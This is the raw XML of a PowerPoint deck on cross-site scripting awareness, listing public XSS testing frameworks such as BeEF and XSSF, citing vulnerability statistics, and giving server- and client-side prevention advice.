            <a:ext cx="8064000" cy="986400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="419100" indent="-419100">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip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Application Performance Management Service Offering Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8436459" y="6571676"/>
            <a:ext cx="527541" cy="10772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b-NO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:fld id="{764C9C99-B580-4DD6-9304-E82BEA2C3378}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/26/2015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1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 bwMode="hidden">
          <a:xfrm>
            <a:off x="0" y="6307200"/>
            <a:ext cx="9144000" cy="5508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itchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rektangel 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="hidden">
          <a:xfrm rot="5400000">
            <a:off x="5625000" y="3339000"/>
            <a:ext cx="6858000" cy="180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itchFamily="34" charset="0"/>
            </a:endParaRPr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540000" y="454518"/>
            <a:ext cx="8064000" cy="984538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="3600" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0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en-US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40000" y="1716374"/>
            <a:ext cx="8064000" cy="442727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en-US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 bwMode="black">
          <a:xfrm>
            <a:off x="1425306" y="6571676"/>
            <a:ext cx="7018650" cy="10772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700" b="1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 noProof="1" smtClean="0"/>
              <a:t>Application Performance Management Service Offering Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="1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 bwMode="black">
          <a:xfrm>
            <a:off x="8244000" y="6400818"/>
            <a:ext cx="720000" cy="107722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7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ktangel 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="hidden">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="180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itchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rektangel 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="hidden">
          <a:xfrm rot="5400000">
            <a:off x="-3339000" y="3339000"/>
            <a:ext cx="6858000" cy="180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itchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Rett linje 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="black">
          <a:xfrm>
            <a:off x="1432800" y="6705622"/>
            <a:ext cx="7531200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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tt linje 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="black">
          <a:xfrm>
            <a:off x="1432800" y="6541200"/>
            <a:ext cx="7531200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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ate Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="black">
          <a:xfrm>
            <a:off x="8436459" y="6571676"/>
            <a:ext cx="527541" cy="10772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b-NO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:fld id="{CA843FE4-C2E6-4202-9C92-A3FC33743ED6}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/26/2015</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="itera_consult_ppt_logo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 bwMode="invGray">
          <a:xfrm>
            <a:off x="0" y="6394742"/>
            <a:ext cx="1194717" cy="46325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1" r:id="rId2"/>
    <p:sldLayoutId id="2147483649" r:id="rId3"/>
    <p:sldLayoutId id="2147483660" r:id="rId4"/>
    <p:sldLayoutId id="2147483650" r:id="rId5"/>
    <p:sldLayoutId id="2147483652" r:id="rId6"/>
    <p:sldLayoutId id="2147483657" r:id="rId7"/>
    <p:sldLayoutId id="2147483654" r:id="rId8"/>
    <p:sldLayoutId id="2147483655" r:id="rId9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Arial" pitchFamily="34" charset="0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630238" indent="-173038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1101725" indent="-187325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550988" indent="-179388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2024063" indent="-195263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531563" y="296408"/>
            <a:ext cx="8100000" cy="91244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31563" y="1480782"/>
            <a:ext cx="8100000" cy="446765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7564566" y="6438445"/>
            <a:ext cx="821717" cy="2236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rgbClr val="414042"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:fld id="{CA843FE4-C2E6-4202-9C92-A3FC33743ED6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642725" y="6438972"/>
            <a:ext cx="5886425" cy="2227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cap="all" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="414042"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1" smtClean="0"/>
              <a:t>Application Performance Management Service Offering Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="1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417729" y="6440278"/>
            <a:ext cx="434100" cy="2231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rgbClr val="414042"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Page </a:t>
            </a:r>
            <a:fld id="{59116C4F-506C-422F-99BF-DA58E0F7A7E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035039"/>
            <a:ext cx="1277305" cy="822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00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hf hdr="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914190" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="2799" b="1" u="none" kern="1200" cap="none" baseline="0">
          <a:solidFill>
            <a:srgbClr val="D7090C"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="265602" indent="-265602" algn="l" defTabSz="91419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32756" indent="-316937" algn="l" defTabSz="91419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87200" indent="-254441" algn="l" defTabSz="91419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310" indent="-295734" algn="l" defTabSz="91419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91378" indent="-264487" algn="l" defTabSz="91419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24" indent="-228547" algn="l" defTabSz="91419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21" indent="-228547" algn="l" defTabSz="91419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15" indent="-228547" algn="l" defTabSz="91419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11" indent="-228547" algn="l" defTabSz="91419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1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6" algn="l" defTabSz="9141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90" algn="l" defTabSz="9141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87" algn="l" defTabSz="9141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81" algn="l" defTabSz="9141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77" algn="l" defTabSz="9141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72" algn="l" defTabSz="9141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68" algn="l" defTabSz="9141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63" algn="l" defTabSz="9141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dominator.mindedsecurity.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://beefproject.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.google.com/p/xssf/" TargetMode="External"/><Relationship Id="rId9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enzic.com/downloads/Cenzic_Vulnerability_Report_2014.pdf" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.spiderlabs.com/2013/08/the-web-is-vulnerable-xss-on-the-battlefront-part-1.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://info.whitehatsec.com/rs/whitehatsecurity/images/statsreport2014-20140410.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.JPG"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.JPG"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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hyperlink" Target="https://code.google.com/p/domxsswiki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1968001"/>
            <a:ext cx="7772400" cy="1384799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Warning – you’ve been </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>XSSed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600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684999" y="1219200"/>
            <a:ext cx="7773469" cy="741512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SmaRtTalk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88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Tools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 , </a:t>
            </a:r>
            <a:fld id="{037E13A9-09CF-461A-A895-D59E288EE509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APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW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59116C4F-506C-422F-99BF-DA58E0F7A7EE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3" name="Picture 2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563" y="1208857"/>
            <a:ext cx="1972553" cy="924744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661921" y="1208857"/>
            <a:ext cx="3811837" cy="100094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XENOTIX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASP project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Actively developed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Multi-browser tests support</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A lots of other features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Freeware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:hlinkClick r:id="rId4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563" y="2362200"/>
            <a:ext cx="1964541" cy="1219200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3661920" y="2332720"/>
            <a:ext cx="3811837" cy="1000943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="265602" indent="-265602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2756" indent="-316937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7200" indent="-254441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4310" indent="-295734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1378" indent="-264487" algn="l" defTabSz="9141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024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2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15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1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smtClean="0"/>
              <a:t>XSSF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> plugin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Console based utility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web-based GUI present</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Creates a communication channel with victim’s browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Freeware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:hlinkClick r:id="rId6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333" y="3809999"/>
            <a:ext cx="1905000" cy="1066801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3661921" y="3875857"/>
            <a:ext cx="3811837" cy="1000943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="265602" indent="-265602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2756" indent="-316937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7200" indent="-254441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4310" indent="-295734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1378" indent="-264487" algn="l" defTabSz="9141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024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2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15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1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err="1" smtClean="0"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Powerful security framework with </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Console based utility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web-based GUI present</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simple and powerful API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Freeware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:hlinkClick r:id="rId8"/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853" y="4991110"/>
            <a:ext cx="2505959" cy="1049886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3661921" y="5157383"/>
            <a:ext cx="3811837" cy="1000943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="265602" indent="-265602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2756" indent="-316937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7200" indent="-254441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4310" indent="-295734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1378" indent="-264487" algn="l" defTabSz="9141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024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2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15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1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err="1" smtClean="0"/>
              <a:t>DOMinatorPro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scanning Automation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ready Data: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Realtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Dynamic Data Tainting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatic Exploitability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shareware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4102367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  <p:bldP spid="12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How to prevent?</a:t>
            </a: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 , </a:t>
            </a:r>
            <a:fld id="{037E13A9-09CF-461A-A895-D59E288EE509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APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW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59116C4F-506C-422F-99BF-DA58E0F7A7E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1563" y="1480782"/>
            <a:ext cx="8100000" cy="1948218"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" dirty="0" smtClean="0"/>
              <a:t>Server-side protection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Input Validation – do NOT trust anything that comes from users (even Cookies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do not store confidential data in Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encoding of HTML-symbols, JavaScript, CSS and URLs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use filtering functions (like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>filter_sanitize_encoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>filter_sanitize_magic_quotes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) for incoming data filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use different libraries for incoming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>data encoding (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HTML Purifier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Htmlawed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>PHP Anti-XSS Class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>AntiSamy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>XSS-HTML-Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" b="1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31563" y="3702985"/>
            <a:ext cx="8100000" cy="652818"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="265602" indent="-265602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2756" indent="-316937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7200" indent="-254441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4310" indent="-295734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1378" indent="-264487" algn="l" defTabSz="9141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024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2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15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1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Client-side protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use plugins for browsers (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>NoScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>NotScripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Opera and Chrome)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419254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004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Quick facts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220" y="1208856"/>
            <a:ext cx="3735637" cy="653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sz="1900" b="1" dirty="0"/>
              <a:t>82%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of web applications are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS (2013)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 , </a:t>
            </a:r>
            <a:fld id="{037E13A9-09CF-461A-A895-D59E288EE509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APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW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59116C4F-506C-422F-99BF-DA58E0F7A7EE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415" y="1274024"/>
            <a:ext cx="2002744" cy="64994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054" y="2193563"/>
            <a:ext cx="3076575" cy="657225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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4570163" y="2201362"/>
            <a:ext cx="3735637" cy="6533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65602" indent="-265602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2756" indent="-316937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7200" indent="-254441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4310" indent="-295734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1378" indent="-264487" algn="l" defTabSz="9141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024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2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15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1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sz="1900" b="1" dirty="0" smtClean="0"/>
              <a:t>7 out of 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web applications are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to XSS (2014)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322914"/>
            <a:ext cx="2695575" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
